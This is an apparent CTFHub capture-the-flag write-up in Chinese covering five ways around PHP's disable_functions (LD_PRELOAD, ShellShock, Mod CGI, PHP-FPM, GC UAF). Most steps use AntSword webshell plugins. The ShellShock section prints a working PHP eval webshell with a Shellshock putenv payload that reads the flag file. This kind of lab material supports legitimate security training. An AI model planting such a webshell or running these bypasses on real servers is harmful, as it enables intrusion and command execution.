ctfhub Bypass disable_function

fasewer2024-08-07 18:42

LD_PRELOAD

url

蚁剑连接

选择插件

点击开始

查看到此文件名编辑连接拼接到url后面重新连接

点击开启终端

在终端执行命令

复制代码 
ls /
/readfile

ShellShock

url

CTFHub 环境实例 | 提示信息

蚁剑连接

写入shell.php

复制代码 
<?php
  @eval($_REQUEST['ant']);
  putenv("PHP_test=() { :; }; tac /flag >> /var/www/html/test.php");
  error_log("admin",1);
  //mail("admin@localhost","","","","");
?>

使用插件

终端执行命令得到flag

Apache Mod CGI

查看GetFlag

蚁剑连接

直接使用工具

终端执行命令

PHP-FPM

蚁剑连接

工具连接

拼接地址

在终端执行命令

GC UAF

蚁剑连接

使用工具

在终端执行命令

相关推荐
Harrison_zhu44 分钟前
Ubuntu18.04 编译 Android7.1代码报错
android
CYRUS STUDIO3 小时前
Unidbg Trace 反 OLLVM 控制流平坦化(fla)
android·汇编·算法·网络安全·逆向·ollvm
扫地的小何尚3 小时前
NVIDIA工业设施数字孪生中的机器人模拟
android·java·c++·链表·语言模型·机器人·gpu
SHtop115 小时前
Eclipse IDE
ide·eclipse
顾林海5 小时前
深度解析ArrayList工作原理
android·java·面试
安静的海岸_AI5 小时前
Android端WIFI/流量共存技术方案
android
_一条咸鱼_5 小时前
Android Compose 框架进度指示器深入剖析(五十二)
android
张风捷特烈5 小时前
Flutter 伪 3D 绘制#02 | 地平面与透视
android·flutter
每次的天空5 小时前
Kotlin 作用域函数:apply、let、run、with、also
android·开发语言·kotlin
重生之我在写代码6 小时前
如何进行apk反编译
android·程序员·编译器
热门推荐
01我决定放弃搞 Java 了02DeepSeek各版本说明与优缺点分析03如何在WPS和Word/Excel中直接使用DeepSeek功能04本地化部署AI知识库:基于Ollama+DeepSeek+AnythingLLM保姆级教程05苍穹外卖面试总结06从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑07RAG 实践- Ollama+RagFlow 部署本地知识库08DeepSeek R1本地化部署 Ollama + Chatbox 打造最强 AI 工具09如何本地部署AI智能体平台,带你手搓一个AI Agent10Android下HWC以及drm_hwcomposer普法(上)